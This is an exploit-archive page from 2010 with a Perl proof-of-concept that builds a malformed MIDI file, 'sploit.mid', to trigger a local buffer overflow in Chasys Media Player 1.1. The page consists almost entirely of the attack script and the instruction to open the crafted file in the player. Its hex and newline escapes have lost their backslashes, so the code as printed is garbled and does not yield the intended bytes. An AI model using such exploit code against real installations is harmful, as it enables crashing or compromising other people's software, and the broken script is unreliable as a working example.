Chasys Media Player v1.1 (.mid) Local Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Chasys Media Player v1.1 (.mid) Local Buffer Overflow
# Published : 2010-02-22
# Author : cr4wl3r
# Previous Title : GOM Player v2.1.21.4846 (.wav) Buffer Overflow Exploit
# Next Title : E.M. Total Video Player 1.31 (.avi) Local Crash PoC

#!/usr/bin/perl

# Chasys Media Player 1.1 (.mid) Local Buffer Overflow
# Exploit Coded by: cr4wl3r <cr4wl3rx40linuxmailx2Eorg>
# From: Indonesia
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
#
# Disclaimer: The author published the information under the condition
#             that is not in the intention of the reader to use them in order to bring
#             to himself or others a profit or to bring to others damage.
#
#
# Gr33tz: No Thanks


print "
[+]-------------------------------------------------------[+]
[+] Chasys Media Player 1.1 (.mid) Local Buffer Overflow  [+]
[+] By : cr4wl3r <cr4wl3rx40linuxmailx2Eorg>            [+]
[+]-------------------------------------------------------[+]
";


$buff =
"x52x49x46x46xffxffx00x00x52x4dx49x44x64x64x64x64" .
"xf8xffxffxffx4dx54x68x64xffxffxffxffxf8xffxffxf8" .
"xf8xffxffxffxf7xffxffxffxffxffxffxffxffxffxffxff" .
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" .
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff";

open(file, "> sploit.mid");
print (file $buff);
print "nn[+] Done...!!!n
[+] Open with Chasys Media Playern
[+] Coded by cr4wl3rn";